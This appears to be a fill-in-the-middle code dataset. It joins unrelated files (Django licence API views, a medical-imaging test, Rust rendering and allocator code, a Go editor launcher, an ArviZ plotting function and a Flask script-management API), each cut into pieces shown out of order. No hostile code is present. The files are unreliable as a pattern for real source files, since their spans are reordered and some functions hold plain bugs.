value.toUpperCase()
);
}
);
return input;
}
function _parseKey(key)
{
const keyPattern = /^(\w+)::(\w+)\.(\w+)$/;
if (keyPattern.test(key))
{
const match = keyPattern.exec(key);
return {
namespace: match[1],
group: match[2],
key: match[3]
};
}
return null;
}
})(jQuery);
export default TranslationService; | return key; |
views.py | from django.contrib.contenttypes.models import ContentType
from django.db.models import F
from django.http import JsonResponse
from rest_framework import status
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateAPIView
from rest_framework.views import APIView
from api.audit_trail import service as audit_trail_service
from api.audit_trail.enums import AuditType
from api.audit_trail.serializers import AuditSerializer
from api.core import constants
from api.core.authentication import SharedAuthentication, GovAuthentication
from api.core.helpers import str_to_bool
from api.core.permissions import assert_user_has_permission
from lite_content.lite_api.strings import OpenGeneralLicences
from api.open_general_licences.models import OpenGeneralLicence, OpenGeneralLicenceCase
from api.open_general_licences.serializers import OpenGeneralLicenceSerializer
from api.organisations.libraries.get_organisation import get_request_user_organisation
from api.organisations.models import Site
from api.staticdata.statuses.enums import CaseStatusEnum
from api.users.enums import UserType
from api.users.models import GovUser, GovNotification
class OpenGeneralLicenceList(ListCreateAPIView):
authentication_classes = (SharedAuthentication,)
serializer_class = OpenGeneralLicenceSerializer
queryset = (
OpenGeneralLicence.objects.all()
.select_related("case_type")
.prefetch_related("countries", "control_list_entries")
)
def get_serializer_context(self):
user = self.request.user
if hasattr(user, "exporteruser"):
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
cases = (
OpenGeneralLicenceCase.objects.filter(site__in=sites)
.select_related("status", "site", "site__address")
.annotate(records_located_at_name=F("site__site_records_located_at__name"))
)
if str_to_bool(self.request.GET.get("active_only")):
cases = cases.filter(
status__status__in=[
CaseStatusEnum.FINALISED,
CaseStatusEnum.REGISTERED,
CaseStatusEnum.UNDER_ECJU_REVIEW,
]
)
return {"user": user, "organisation": organisation, "cases": cases}
def filter_queryset(self, queryset):
filter_data = self.request.GET
if self.request.user.type == UserType.INTERNAL:
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
elif self.request.user.type == UserType.EXPORTER:
if filter_data.get("site"):
queryset = queryset.filter(cases__site_id=filter_data.get("site"))
if str_to_bool(filter_data.get("active_only")):
queryset = queryset.filter(
cases__status__status__in=[
CaseStatusEnum.FINALISED,
CaseStatusEnum.REGISTERED,
CaseStatusEnum.UNDER_ECJU_REVIEW,
]
)
if str_to_bool(filter_data.get("registered")):
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
queryset = queryset.filter(cases__site__in=sites).distinct()
if filter_data.get("name"):
queryset = queryset.filter(name__icontains=filter_data.get("name"))
if filter_data.get("case_type"):
queryset = queryset.filter(case_type_id=filter_data.get("case_type"))
if filter_data.get("control_list_entry"):
queryset = queryset.filter(control_list_entries__rating=filter_data.get("control_list_entry"))
if filter_data.get("country"):
queryset = queryset.filter(countries__id__contains=filter_data.get("country"))
if filter_data.get("status"):
queryset = queryset.filter(status=filter_data.get("status"))
return queryset
def perform_create(self, serializer):
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
if not self.request.data.get("validate_only", False):
instance = serializer.save()
audit_trail_service.create(
actor=self.request.user, verb=AuditType.OGL_CREATED, action_object=instance,
)
class OpenGeneralLicenceDetail(RetrieveUpdateAPIView):
authentication_classes = (SharedAuthentication,)
serializer_class = OpenGeneralLicenceSerializer
queryset = (
OpenGeneralLicence.objects.all()
.select_related("case_type")
.prefetch_related("countries", "control_list_entries")
)
def get_serializer_context(self):
user = self.request.user
if user.type == UserType.EXPORTER:
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
cases = (
OpenGeneralLicenceCase.objects.filter(site__in=sites)
.select_related("status", "site", "site__address")
.annotate(records_located_at_name=F("site__site_records_located_at__name"))
)
return {"user": user, "organisation": organisation, "cases": cases}
def perform_update(self, serializer):
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
# Don't update the data during validate_only requests
if not self.request.data.get("validate_only", False):
fields = [
("name", OpenGeneralLicences.ActivityFieldDisplay.NAME),
("description", OpenGeneralLicences.ActivityFieldDisplay.DESCRIPTION),
("url", OpenGeneralLicences.ActivityFieldDisplay.URL),
("case_type", OpenGeneralLicences.ActivityFieldDisplay.CASE_TYPE),
("registration_required", OpenGeneralLicences.ActivityFieldDisplay.REGISTRATION_REQUIRED),
("status", OpenGeneralLicences.ActivityFieldDisplay.STATUS),
]
m2m_fields = [
("countries", OpenGeneralLicences.ActivityFieldDisplay.COUNTRIES),
("control_list_entries", OpenGeneralLicences.ActivityFieldDisplay.CONTROL_LIST_ENTRIES),
]
# data setup for audit checks
original_instance = self.get_object()
original_m2m_sets = {}
for field, display in m2m_fields:
original_m2m_sets[field] = set(getattr(original_instance, field).all())
# save model
updated_instance = serializer.save()
for field, display in fields:
if getattr(original_instance, field) != getattr(updated_instance, field):
audit_trail_service.create(
actor=self.request.user,
verb=AuditType.OGL_FIELD_EDITED,
action_object=updated_instance,
payload={
"key": display,
"old": getattr(original_instance, field),
"new": getattr(updated_instance, field),
},
)
for field, display in m2m_fields:
if original_m2m_sets[field] != set(getattr(updated_instance, field).all()):
audit_trail_service.create(
actor=self.request.user,
verb=AuditType.OGL_MULTI_FIELD_EDITED,
action_object=updated_instance,
payload={"key": display},
)
class OpenGeneralLicenceActivityView(APIView):
authentication_classes = (GovAuthentication,)
def get(self, request, pk):
| assert_user_has_permission(request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
filter_data = audit_trail_service.get_filters(request.GET)
content_type = ContentType.objects.get_for_model(OpenGeneralLicence)
audit_trail_qs = audit_trail_service.filter_object_activity(
object_id=pk, object_content_type=content_type, **filter_data
)
data = AuditSerializer(audit_trail_qs, many=True).data
if isinstance(request.user, GovUser):
# Delete notifications related to audits
GovNotification.objects.filter(user_id=request.user.pk, object_id__in=[obj["id"] for obj in data]).delete()
filters = audit_trail_service.get_objects_activity_filters(pk, content_type)
return JsonResponse(data={"activity": data, "filters": filters}, status=status.HTTP_200_OK) |
|
test_classification_knight.py | """
(C) Copyright 2021 IBM Corp.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on June 30, 2021
"""
import pathlib
import shutil
import tempfile
import unittest
import os
from fuse.utils.file_io.file_io import create_dir
import wget
from fuse_examples.classification.knight.eval.eval import eval
from fuse_examples.classification.knight.make_targets_file import make_targets_file | def setUp(self):
self.root = tempfile.mkdtemp()
def test_eval(self):
dir_path = pathlib.Path(__file__).parent.resolve()
target_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_targets.csv")
task1_prediction_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_task1_predictions.csv")
task2_prediction_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_task2_predictions.csv")
eval(target_filename=target_filename, task1_prediction_filename=task1_prediction_filename, task2_prediction_filename=task2_prediction_filename, output_dir=self.root)
def test_make_targets(self):
dir_path = pathlib.Path(__file__).parent.resolve()
data_path = os.path.join(self.root, "data")
cache_path = os.path.join(self.root, "cache")
split = os.path.join(dir_path, "../classification/knight/baseline/splits_final.pkl")
output_filename = os.path.join(self.root, "output/validation_targets.csv")
create_dir(os.path.join(data_path, "knight", "data"))
create_dir(os.path.dirname(output_filename))
wget.download("https://raw.github.com/neheller/KNIGHT/main/knight/data/knight.json", os.path.join(data_path, "knight", "data"))
make_targets_file(data_path=data_path, cache_path=cache_path, split=split, output_filename=output_filename)
@unittest.skip("Not ready yet")
# TODOs: set KNIGHT data
# 1 Set 'KNIGHT_DATA' ahead (and not in the test)
# 2, Add code that skip test if this var wasn't set
# 2. Modify main() to support overriding the arguments and override number of epochs to 2 (and maybe number of samples)
# 3. Use and test make predictions (inference script)
def test_train(self):
os.environ['KNIGHT_DATA'] = "/projects/msieve/MedicalSieve/PatientData/KNIGHT"
os.environ['KNIGHT_CACHE'] = os.path.join(self.root, "train", "cache")
os.environ['KNIGHT_RESULTS'] = os.path.join(self.root, "train", "results")
baseline.main()
def tearDown(self):
# Delete temporary directories
shutil.rmtree(self.root)
if __name__ == '__main__':
unittest.main() | import fuse_examples.classification.knight.baseline.fuse_baseline as baseline
class KnightTestTestCase(unittest.TestCase):
|
widgets.rs | use crate::text::layout::*;
use super::*;
//TODO refine standard render functions
pub trait RenderStdWidgets<E>: Render<E> where E: Env, /*ERenderer<E>: AsRefMut<Self>,*/ {
/// Fill the current bounds with the color derived from style
fn fill_rect(&mut self, c: &mut E::Context);
/// Fill the current bounds with the color and thickness derived from style
fn fill_border_inner(&mut self, c: &mut E::Context);
#[deprecated = "avoid this because stuff is not cached"]
#[inline]
fn render_text(&mut self, text: &str, align: (f32,f32), c: &mut E::Context) |
fn render_preprocessed_text(&mut self, text: &ETextLayout<E>, inner_offset: Offset, c: &mut E::Context);
fn set_cursor_specific(&mut self, cursor: &ESCursor<E>, c: &mut E::Context);
/// Set the cursor to the cursor derived from style
#[inline]
fn set_cursor(&mut self, c: &mut E::Context) {
self.set_cursor_specific(&self._style().cursor(self._selector(),c),c);
}
//fn draw_text_button(&mut self, c: &mut E::Context, pressed: bool, caption: &str);
//fn draw_selected(&mut self, c: &mut E::Context);
}
| {
let g: ETextLayout<E> = TxtLayoutFromStor::<E,&str>::from(&text,c);
let oldb = self._bounds().clone();
let newb = oldb.inner_aligned(g.size(),align);
self._set_bounds(&newb);
self.render_preprocessed_text(&g,Offset::default(),c);
self._set_bounds(&oldb);
} |
physical_allocator.rs | ///! A modified buddy bitmap allocator. Written originally in
/// [buddy allocator workshop](https://github.com/Restioson/buddy-allocator-workshop).
use core::{mem, ptr, ops::{Range, Deref, DerefMut}};
#[cfg(test)]
use std::boxed::Box;
#[cfg(not(test))]
use alloc::boxed::Box;
use spin::{Mutex, Once};
use super::bootstrap_heap::{BootstrapHeapBox, BOOTSTRAP_HEAP};
/// Number of orders.
const LEVEL_COUNT: u8 = 19;
/// The base order size. All orders are in context of this -- i.e the size of a block of order `k`
/// is `2^(k + MIN_ORDER)`, not `2^k`.
const BASE_ORDER: u8 = 12;
/// The physical frame allocator. Requires the bootstrap heap to be initialized, or else the
/// initializer will panic.
pub static PHYSICAL_ALLOCATOR: PhysicalAllocator<'static> = PhysicalAllocator {
trees: Once::new(),
};
// Panics from `buddy_allocator.rs` will say they're from here. Go there instead.
buddy_allocator_bitmap_tree!(LEVEL_COUNT = LEVEL_COUNT, BASE_ORDER = BASE_ORDER);
pub struct PhysicalAllocator<'a> {
// Max 256GiB
trees: Once<[Mutex<Option<Tree<TreeBox<'a>>>>; 256]>,
}
impl<'a> PhysicalAllocator<'a> {
/// Create a new, initialized allocator
#[cfg(test)]
fn new<'r, I>(gibbibytes: u8, usable: I) -> Self
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
let allocator = PhysicalAllocator {
trees: Once::new(),
};
allocator.init_prelim(usable.clone());
allocator.init_rest(gibbibytes, usable);
allocator
}
/// Initialize the allocator's first 8 gibbibytes. The PMM has a two stage init -- in the first
/// stage, the first 8 GiBs are set up, using the bootstrap heap. This is enough to set up the
/// main kernel heap. In the second stage, the rest of the GiBs are set up, using the kernel
/// heap.
pub fn init_prelim<'r, I>(&self, usable: I)
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
self.trees.call_once(|| {
let mut trees: [Mutex<Option<Tree<TreeBox<'a>>>>; 256] = unsafe {
mem::uninitialized()
};
// Set up all as Nones to avoid any UB from `panic`s
for slot in trees.iter_mut() {
unsafe { ptr::write(slot as *mut _, Mutex::new(None)); }
}
// Init the first 8 trees on the bootstrap heap
for (i, slot) in trees.iter_mut().take(8).enumerate() {
let usable = Self::localize(i as u8, usable.clone());
#[cfg(not(test))]
let tree = Tree::new(
usable,
TreeBox::Bootstrap(
unsafe {
BOOTSTRAP_HEAP.allocate().expect("Ran out of bootstrap heap memory!")
}
)
);
#[cfg(test)]
let tree = Tree::new(
usable,
TreeBox::Heap(box unsafe { mem::uninitialized() }),
);
*slot = Mutex::new(Some(tree));
}
trees
});
}
/// Initialise the rest of the allocator's gibbibytes. See [PhysicalAllocator.init_prelim].
pub fn init_rest<'r, I>(&self, gibbibytes: u8, usable: I)
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
let trees = self.trees.wait().unwrap();
for i in 8..=gibbibytes {
let usable = Self::localize(i as u8, usable.clone());
let tree = Tree::new(usable, TreeBox::Heap(box unsafe { mem::uninitialized() }));
*trees[i as usize].lock() = Some(tree);
}
}
/// Filter out addresses that apply to a GiB and make them local to it
fn localize<'r, I>(gib: u8, usable: I) -> impl Iterator<Item=Range<usize>> + Clone + 'r
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
(&usable).clone()
.filter_map(move |range| {
let gib = ((gib as usize) << 30)..((gib as usize + 1 << 30) + 1);
// If the range covers any portion of the GiB
if !(range.start > gib.end) && !(range.end < gib.start) {
let end = range.end - gib.start;
let begin = if range.start >= gib.start {
range.start - gib.start // Begin is within this GiB
} else {
0 // Begin is earlier than this GiB
};
Some(begin..end)
} else {
None
}
})
}
/// Allocate a frame of order `order`. Panics if not initialized. Does __not__ zero the memory.
pub fn allocate(&self, order: u8) -> Option<*const u8> {
#[derive(Eq, PartialEq, Copy, Clone, Debug)]
enum TryState {
Tried,
WasInUse,
Untried,
}
let mut tried = [TryState::Untried; 256];
// Try every tree. If it's locked, come back to it later.
loop {
let index = tried.iter()
.position(|i| *i == TryState::Untried)
.or_else(
|| tried.iter().position(|i| *i == TryState::WasInUse)
)?;
let trees = self.trees.wait().unwrap();
// Try to lock the tree
if let Some(ref mut tree) = trees[index].try_lock() {
// Get Option<&mut Tree>
if let Some(ref mut tree) = tree.as_mut() {
// Try to allocate something on the tree
match tree.allocate(order) {
Some(address) => return Some(
(address as usize + (index * (1 << MAX_ORDER + BASE_ORDER))) as *const u8
),
None => tried[index] = TryState::Tried, // Tree empty for alloc of this size
}
} else |
} else {
// Tree was already locked -- it is busy and in use by something else (in futuure,
// another core)
tried[index] = TryState::WasInUse;
}
}
}
/// Deallocate the block of `order` at `ptr`. Panics if not initialized, if block is free, or if
/// block is out of bounds of the # of GiB available.
pub fn deallocate(&self, ptr: *const u8, order: u8) {
let tree = (ptr as usize) >> (LEVEL_COUNT - 1 + BASE_ORDER);
let local_ptr = (ptr as usize % (1 << LEVEL_COUNT - 1 + BASE_ORDER)) as *const u8;
let trees = self.trees.wait().unwrap();
let mut lock = trees[tree].lock();
let tree = lock.as_mut().unwrap();
tree.deallocate(local_ptr, order);
}
}
enum TreeBox<'a> {
Bootstrap(BootstrapHeapBox<'a, [Block; BLOCKS_IN_TREE]>),
Heap(Box<[Block; BLOCKS_IN_TREE]>),
}
impl<'a> Deref for TreeBox<'a> {
type Target = [Block; BLOCKS_IN_TREE];
fn deref(&self) -> &[Block; BLOCKS_IN_TREE] {
use self::TreeBox::*;
match self {
Bootstrap(tree_box) => tree_box,
Heap(tree_box) => tree_box,
}
}
}
impl<'a> DerefMut for TreeBox<'a> {
fn deref_mut(&mut self) -> &mut [Block; BLOCKS_IN_TREE] {
use self::TreeBox::*;
match self {
Bootstrap(tree_box) => tree_box,
Heap(tree_box) => tree_box,
}
}
}
#[cfg(test)]
mod test {
use core::iter;
use super::*;
#[test]
fn test_alloc_physical_allocator() {
let allocator = PhysicalAllocator::new(
2,
iter::once(&(0..(2 << MAX_ORDER + BASE_ORDER) + 1)),
);
assert_eq!(allocator.allocate(0).unwrap(), 0x0 as *const u8);
let trees = allocator.trees.wait().unwrap();
let _tree_lock = trees[0].lock();
assert_eq!(allocator.allocate(0).unwrap(), (1 << ((MAX_ORDER + BASE_ORDER) as u32)) as *const u8);
}
#[test]
fn test_dealloc_physical_allocator() {
let allocator = PhysicalAllocator::new(
2,
iter::once(&(0..(2 << 30) + 1)),
);
allocator.allocate(0).unwrap();
allocator.deallocate(0x0 as *const u8, 0);
assert_eq!(allocator.allocate(5).unwrap(), 0x0 as *const u8);
}
#[test]
fn test_init() {
let allocator = PhysicalAllocator {
trees: Once::new(),
};
allocator.init_prelim(iter::once(&(0..(9 << 30) + 1)));
let trees = allocator.trees.wait().unwrap();
assert!(trees[8].lock().is_none());
assert!(trees[7].lock().is_some());
allocator.init_rest(
9,
iter::once(&(0..(9 << 30) + 1)),
);
assert!(trees[8].lock().is_some());
}
}
| {
// Tree was None and nonexistent. We've tried it so set it to tried
tried[index] = TryState::Tried;
} |
editor.go | // Package editor is a collection of utilities to find and spawn a sensible editor
package editor
import (
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"strings"
)
const bugMessage = "This is a bug in sensible; please file at https://github.com/ernestrc/sensible/issues"
// inspired by i3-sensible-editor
// The order has been altered to make the world a better place
var editors = []string{"$EDITOR", "$VISUAL", "vim", "nvim", "vi", "emacs", "nano", "pico", "qe", "mg", "jed", "gedit", "mc-edit"}
var basePath = []string{"/usr/local/bin", "/usr/bin", "/usr/sbin", "/bin"}
var userPath []string
var selectedExec string
var selectedArgs []string
var selectedEditor *Editor
func init() {
editors[0] = os.Getenv("EDITOR")
editors[1] = os.Getenv("VISUAL")
pathEnv := os.Getenv("PATH")
if pathEnv == "" {
userPath = basePath
} else {
userPath = strings.Split(pathEnv, ":")
}
}
func isExecutable(f os.FileInfo) bool {
return f.Mode().Perm()|0111 != 0
}
func getFileName(f os.FileInfo) string {
_, fileName := filepath.Split(f.Name())
return fileName
}
func isRegularOrSymlink(finfo os.FileInfo) bool {
mode := finfo.Mode()
return mode.IsRegular() || mode&os.ModeSymlink != 0
}
func parseAlias(alias string) (name string, args []string) {
split := strings.Split(alias, " ")
if len(split) == 0 {
return "", nil
}
_, name = filepath.Split(split[0])
return name, split[1:]
}
func findExec(alias string) (execPath string, execArgs []string, err error) {
var files []os.FileInfo
name, args := parseAlias(alias)
for _, dir := range userPath {
if files, err = ioutil.ReadDir(dir); err != nil {
return
}
for _, finfo := range files {
if isRegularOrSymlink(finfo) &&
isExecutable(finfo) &&
getFileName(finfo) == name {
execPath = path.Join(dir, name)
execArgs = args
return
}
}
}
return "", nil, nil
}
func (e *Editor) clean() {
e.proc = nil
e.procState = nil
}
func findEditor(editors []string) (editor *Editor, err error) {
// cached
if selectedExec != "" {
if selectedArgs == nil {
panic(fmt.Sprintf("parsed args is empty but selected has been cached. %s", bugMessage))
}
return NewEditor(selectedExec, selectedArgs...), nil
}
for _, editor := range editors {
selectedExec, selectedArgs, err = findExec(editor)
if err != nil {
return nil, err
}
if selectedExec != "" {
return NewEditor(selectedExec, selectedArgs...), nil
}
}
return nil, fmt.Errorf("FindEditor: could not find an editor; please set $VISUAL or $EDITOR environment variables or install one of the following editors: %v", editors) | func NewEditor(abspath string, args ...string) *Editor {
return &Editor{path: abspath, Args: args}
}
// FindEditor will attempt to find the user's preferred editor
// by scanning the PATH in search of EDITOR and VISUAL env variables
// or will default to one of the commonly installed editors.
// Failure to find a suitable editor will result in an error
func FindEditor() (editor *Editor, err error) {
return findEditor(editors)
}
// Edit will attempt to edit the passed files with the user's preferred editor.
// Check the documentation of Editor.Edit and FindEditor for more information.
func Edit(files ...*os.File) error {
var err error
if selectedEditor == nil {
if selectedEditor, err = FindEditor(); err != nil {
return err
}
}
return selectedEditor.Edit(files...)
}
// EditTmp will place the contents of "in" in a temp file,
// start a editor process to edit the tmp file, and return
// the contents of the tmp file after the process exits, or an error
// if editor exited with non 0 status
func EditTmp(in string) (out string, err error) {
if selectedEditor == nil {
if selectedEditor, err = FindEditor(); err != nil {
return
}
}
return selectedEditor.EditTmp(in)
}
// Editor stores the information about an editor and its processes
type Editor struct {
path string
proc *os.Process
procState *os.ProcessState
// extra arguments to be passed to the editor process before filename(s)
Args []string
// extra process attributes to be used when spawning editor process
ProcAttrs *os.ProcAttr
}
// GetPath returns the editors executable path
func (e *Editor) GetPath() string {
return e.path
}
// Edit will start a new process and wait for the process to exit.
// If process exists with non 0 status, this will be reported as an error
func (e *Editor) Edit(files ...*os.File) error {
var err error
if err = e.Start(files...); err != nil {
return err
}
if err = e.Wait(); err != nil {
return err
}
return nil
}
// Start will start a new process and pass the list of files as arguments
func (e *Editor) Start(f ...*os.File) error {
if e.proc != nil {
return fmt.Errorf("Editor.Start: there is already an ongoing session")
}
args := []string{""}
var fds = []*os.File{os.Stdin, os.Stdout, os.Stderr}
if e.Args != nil {
for _, arg := range e.Args {
args = append(args, arg)
}
}
for _, file := range f {
args = append(args, file.Name())
fds = append(fds, file)
}
var procAttrs *os.ProcAttr
if e.ProcAttrs == nil {
procAttrs = &os.ProcAttr{
Dir: "",
Env: nil,
Files: fds,
Sys: nil,
}
} else {
procAttrs = e.ProcAttrs
}
var err error
if e.proc, err = os.StartProcess(e.path, args, procAttrs); err != nil {
return err
}
return nil
}
// Wait waits for the current editor process to exit and returns
// an error if editor exited with non 0 status
func (e *Editor) Wait() error {
var err error
if e.proc == nil {
return fmt.Errorf("Editor.Wait: no process is currently running")
}
if e.procState, err = e.proc.Wait(); err != nil {
return err
}
if !e.procState.Success() {
return fmt.Errorf("Editor.Wait: editor process exited with non 0 status: %s", e.procState.String())
}
e.clean()
return nil
}
// EditTmp will place the contents of "in" in a temp file,
// start a editor process to edit the tmp file, and return
// the contents of the tmp file after the process exits, or an error
// if editor exited with non 0 status
func (e *Editor) EditTmp(in string) (out string, err error) {
var f *os.File
var outBytes []byte
if f, err = ioutil.TempFile("/tmp", "sedit_"); err != nil {
return
}
if err = ioutil.WriteFile(f.Name(), []byte(in), 0600); err != nil {
return
}
if err = e.Edit(f); err != nil {
return
}
if outBytes, err = ioutil.ReadFile(f.Name()); err != nil {
return
}
out = string(outBytes)
return
} | }
// NewEditor will create a new Editor struct with the given executable path |
autocorrplot.py | """Autocorrelation plot of data."""
from ..data import convert_to_dataset
from ..labels import BaseLabeller
from ..sel_utils import xarray_var_iter
from ..rcparams import rcParams
from ..utils import _var_names
from .plot_utils import default_grid, filter_plotters_list, get_plotting_function
def | (
data,
var_names=None,
filter_vars=None,
max_lag=None,
combined=False,
grid=None,
figsize=None,
textsize=None,
labeller=None,
ax=None,
backend=None,
backend_config=None,
backend_kwargs=None,
show=None,
):
"""Bar plot of the autocorrelation function for a sequence of data.
Useful in particular for posteriors from MCMC samples which may display correlation.
Parameters
----------
data: obj
Any object that can be converted to an az.InferenceData object
Refer to documentation of az.convert_to_dataset for details
var_names: list of variable names, optional
Variables to be plotted, if None all variable are plotted. Prefix the
variables by `~` when you want to exclude them from the plot. Vector-value
stochastics are handled automatically.
filter_vars: {None, "like", "regex"}, optional, default=None
If `None` (default), interpret var_names as the real variables names. If "like",
interpret var_names as substrings of the real variables names. If "regex",
interpret var_names as regular expressions on the real variables names. A la
`pandas.filter`.
max_lag: int, optional
Maximum lag to calculate autocorrelation. Defaults to 100 or num draws, whichever is smaller
combined: bool
Flag for combining multiple chains into a single chain. If False (default), chains will be
plotted separately.
grid : tuple
Number of rows and columns. Defaults to None, the rows and columns are
automatically inferred.
figsize: tuple
Figure size. If None it will be defined automatically.
Note this is not used if ax is supplied.
textsize: float
Text size scaling factor for labels, titles and lines. If None it will be autoscaled based
on figsize.
labeller : labeller instance, optional
Class providing the method `make_label_vert` to generate the labels in the plot titles.
Read the :ref:`label_guide` for more details and usage examples.
ax: numpy array-like of matplotlib axes or bokeh figures, optional
A 2D array of locations into which to plot the densities. If not supplied, Arviz will create
its own array of plot areas (and return it).
backend: str, optional
Select plotting backend {"matplotlib","bokeh"}. Default "matplotlib".
backend_config: dict, optional
Currently specifies the bounds to use for bokeh axes. Defaults to value set in rcParams.
backend_kwargs: dict, optional
These are kwargs specific to the backend being used. For additional documentation
check the plotting method of the backend.
show: bool, optional
Call backend show function.
Returns
-------
axes: matplotlib axes or bokeh figures
Examples
--------
Plot default autocorrelation
.. plot::
:context: close-figs
>>> import arviz as az
>>> data = az.load_arviz_data('centered_eight')
>>> az.plot_autocorr(data)
Plot subset variables by specifying variable name exactly
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['mu', 'tau'] )
Combine chains by variable and select variables by excluding some with partial naming
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['~thet'], filter_vars="like", combined=True)
Specify maximum lag (x axis bound)
.. plot::
:context: close-figs
>>> az.plot_autocorr(data, var_names=['mu', 'tau'], max_lag=200, combined=True)
"""
data = convert_to_dataset(data, group="posterior")
var_names = _var_names(var_names, data, filter_vars)
# Default max lag to 100 or max length of chain
if max_lag is None:
max_lag = min(100, data["draw"].shape[0])
if labeller is None:
labeller = BaseLabeller()
plotters = filter_plotters_list(
list(xarray_var_iter(data, var_names, combined)), "plot_autocorr"
)
rows, cols = default_grid(len(plotters), grid=grid)
autocorr_plot_args = dict(
axes=ax,
plotters=plotters,
max_lag=max_lag,
figsize=figsize,
rows=rows,
cols=cols,
combined=combined,
textsize=textsize,
labeller=labeller,
backend_kwargs=backend_kwargs,
show=show,
)
if backend is None:
backend = rcParams["plot.backend"]
backend = backend.lower()
if backend == "bokeh":
autocorr_plot_args.update(backend_config=backend_config)
# TODO: Add backend kwargs
plot = get_plotting_function("plot_autocorr", "autocorrplot", backend)
axes = plot(**autocorr_plot_args)
return axes
| plot_autocorr |
scripts.py | from flask import Blueprint, request, make_response, jsonify
from sqlalchemy import and_
from sqlalchemy.orm import query
from tester_web.tables import db_session
from tester_web.tables.user import User, Api, Script, ApiUser, UserScript
scripts = Blueprint('scripts', __name__,url_prefix='/scripts')
@scripts.route('/list',methods=['get'])
def script_list(*args,**kwargs):
# db_session.query()
username = request.json.get("username")
api = request.json.get("api")
try:
if username is not None and api is None:
user = db_session.query(User).filter_by(username=username).one()
user_apis = db_session.query(UserScript.id).filter_by(user_id=user.id).all()
| for script in scripts:
data = {"id":script.id,"description":script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200,"msg":content}))
elif username is None and api is not None:
content = []
api = db_session.query(Api).filter_by(api=api).one()
user_apis = db_session.query(UserScript.id).filter_by(api_id=api.id).all()
scripts = db_session.query(Script).filter(Script.api_user_id.in_(user_apis)).all()
for script in scripts:
data = {"id":script.id,"description":script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200, "msg": content}))
else:
user_api = db_session.query(UserScript.id).filter_by(user_id=api.id).filter_by(api_id=api.id).one()
script = db_session.query(Script).filter_by(api_user_id=user_api).one()
content = []
data = {"id": script.id, "description": script.description,
"script_content": script.script_content}
content.append(data)
return make_response(jsonify({"code": 200, "msg": content}))
except Exception as e:
return make_response(jsonify({"code": 404, "error_msg": e}))
@scripts.route('/add',methods=['post'])
def script_add(*args,**kwargs):
# 用户自己添加脚本或者,
username = request.json.get('username')
api_description = request.json.get('api_description')
try:
user = db_session.query(User).filter_by(username=username).one()
user_id = user.id
api = db_session.query(Api).filter_by(api_description=api_description).one()
api_id = api.id
api_user = db_session.query(ApiUser).filter_by(user_id=user_id,api_id=api_id).one()
api_user_id = api_user.id
except Exception as e:
return make_response(jsonify({"code": 404,"error_msg":e}))
script_content = request.json.get('script_content')
description = request.json.get('script_description')
try:
script = Script(api_user_id=api_user_id,script_content=script_content,description=description)
db_session.add(script)
db_session.commit()
return make_response(jsonify({"code": 200,"msg": u'脚本添加成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "error_msg": e}))
@scripts.route('/adduser',methods=['post'])
def script_adduser(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
try:
userscript = UserScript(user_id=user_id,script_id=script_id)
db_session.add(userscript)
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'添加用户成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
# 为某个用户添加脚本权限,都能看到,但是只有有权限的用户才能修改
@scripts.route('/delete',methods=['post'])
def script_delete(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
try:
script = db_session.query(UserScript).filter_by(user_id=user_id).filter_by(script_id=script_id).one()
if script.id is not None:
db_session.query(Script).filter_by(script_id=script_id).delete()
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'脚本删除成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
@scripts.route('/upgrade',methods=['post'])
def script_upgrade(*args,**kwargs):
user_id = request.json.get('user_id')
script_id = request.json.get('script_id')
script_content = request.json.get('script_content')
description = request.json.get('script_description')
try:
script = db_session.query(UserScript).filter_by(user_id=user_id).filter_by(script_id=script_id).one()
if script.id is not None:
db_session.query(Script).filter_by(script_id=script_id).update(script_content=script_content,description=description)
db_session.commit()
return make_response(jsonify({"code": 200, "msg": u'脚本更新成功'}))
except Exception as e:
return make_response(jsonify({"code": 404, "msg": e}))
@scripts.route('/run',methods=['POST'])
def script_run(*args,**kwargs):
pass | scripts = db_session.query(Script).filter(Script.api_user_id.in_(user_apis)).all()
content = []
|
test_energy_regressor.py | from tempfile import TemporaryDirectory
import numpy as np
from numpy.testing import assert_allclose
from astropy import units as u
from ctapipe.reco.energy_regressor import EnergyRegressor
def test_prepare_model():
cam_id_list = ["FlashCam", "ASTRICam"]
feature_list = {"FlashCam": [[1, 10], [2, 20], [3, 30], [0.9, 9],
],
"ASTRICam": [[10, 1], [20, 2], [30, 3], [9, 0.9],
]}
